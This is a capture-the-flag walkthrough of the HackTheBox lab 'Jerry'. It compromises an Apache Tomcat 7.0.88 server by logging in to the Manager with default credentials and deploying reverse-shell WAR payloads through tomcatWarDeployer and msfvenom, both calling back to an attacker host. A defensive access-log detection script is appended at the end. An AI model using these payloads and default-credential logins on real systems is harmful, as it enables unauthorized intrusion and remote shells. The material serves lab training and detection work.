Today we are going to solve another HackTheBox machine, “Jerry”, created by mrh4sh. The lab mainly focuses on exploiting an Apache Tomcat server.
Level: Easy
- Network scanning
- Tomcat enumeration
- Tomcat 7.0.88 exploit
- Virtual Environment setup
- Privilege Escalation
- Manual Exploitation
IP address: 10.129.1.110
We start our journey by running an Nmap scan against the machine to enumerate its open ports and services.
nmap -sC -sV -p- 10.129.1.110 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 23:51 IST
Nmap scan report for 10.129.1.110
Host is up (0.16s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Nmap shows that port 8080 is open and that Apache Tomcat is running on it; the page title also reveals the version, 7.0.88, which is exploitable. After some googling we land on the exploit, which you can get from GitHub.
After reading the exploit and understanding its flow, we set up a virtual environment so that we can install the dependencies needed to run it.
git clone https://github.com/mgeeky/tomcatWarDeployer.git
virtualenv -p python2 venv
source venv/bin/activate
pip install -r requirements.txt
Once everything is set, we also need credentials for the Tomcat server. After some googling we land on a GitHub page that lists default credentials; after trying a few of them we got in with “admin:s3cret”. After a successful exploit we got an administrative shell and collected the flags.
python tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.79 -p 1234 10.129.1.110:8080 -x type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
You can also exploit the server without the tomcatWarDeployer script: for this we create a Metasploit payload and upload it to the Tomcat server.
Once logged in to the manager account, simply go to the WAR file upload section, upload the payload file and deploy it.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.79 LPORT=5454 -f war > shell.war
Once the payload is successfully uploaded, we trigger it with curl and we get the session.
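A defender-side check for the activity in this walkthrough, as an added example that is not part of the original writeup or of tomcatWarDeployer: it parses Tomcat access-log lines in the default AccessLogValve format and flags WAR deployments through the Manager application (the text interface tomcatWarDeployer uses and the HTML upload form used for the msfvenom WAR) together with repeated Manager login failures from one source. The log lines are constructed sample data, reusing the addresses from this writeup.

```python
import re
from collections import Counter

# Default Tomcat AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that install a web application: tomcatWarDeployer uses the
# text interface, a browser (or an msfvenom .war) goes through the HTML upload form.
DEPLOY_PATHS = ("/manager/text/deploy", "/manager/html/upload", "/manager/html/deploy")

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyze(lines, guess_threshold=3):
    """Return (deploy events to the Manager app, IPs with repeated 401s on it)."""
    deploys, failures = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]          # drop the query string
        if path.startswith("/manager/") and rec["status"] == "401":
            failures[rec["ip"]] += 1
        if rec["method"] in ("PUT", "POST") and path.startswith(DEPLOY_PATHS):
            deploys.append({"ip": rec["ip"], "user": rec["user"],
                            "path": rec["path"], "status": rec["status"]})
    guessing = sorted(ip for ip, n in failures.items() if n >= guess_threshold)
    return deploys, guessing

# Constructed sample (not a real capture): three failed manager logins, one
# success, a text-interface deploy, and the first request to the new context.
SAMPLE_LOG = """\
10.10.14.79 - - [15/May/2021:23:52:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.79 - - [15/May/2021:23:52:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.79 - - [15/May/2021:23:52:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.79 - tomcat [15/May/2021:23:52:20 +0530] "GET /manager/html HTTP/1.1" 200 13765
10.10.14.79 - tomcat [15/May/2021:23:55:01 +0530] "PUT /manager/text/deploy?path=/x&update=true HTTP/1.1" 200 43
10.10.14.79 - - [15/May/2021:23:55:03 +0530] "GET /x/ HTTP/1.1" 200 0
192.168.1.20 - - [15/May/2021:23:56:00 +0530] "GET /docs/ HTTP/1.1" 200 19867
"""

if __name__ == "__main__":
    events, ips = analyze(SAMPLE_LOG.splitlines())
    print("deployments:", events)
    print("credential guessing from:", ips)
```

Any deployment event whose user is not an approved deployer, or that is followed by requests to a context nobody provisioned, is worth an alert; disabling the Manager application or binding it to localhost removes this path entirely.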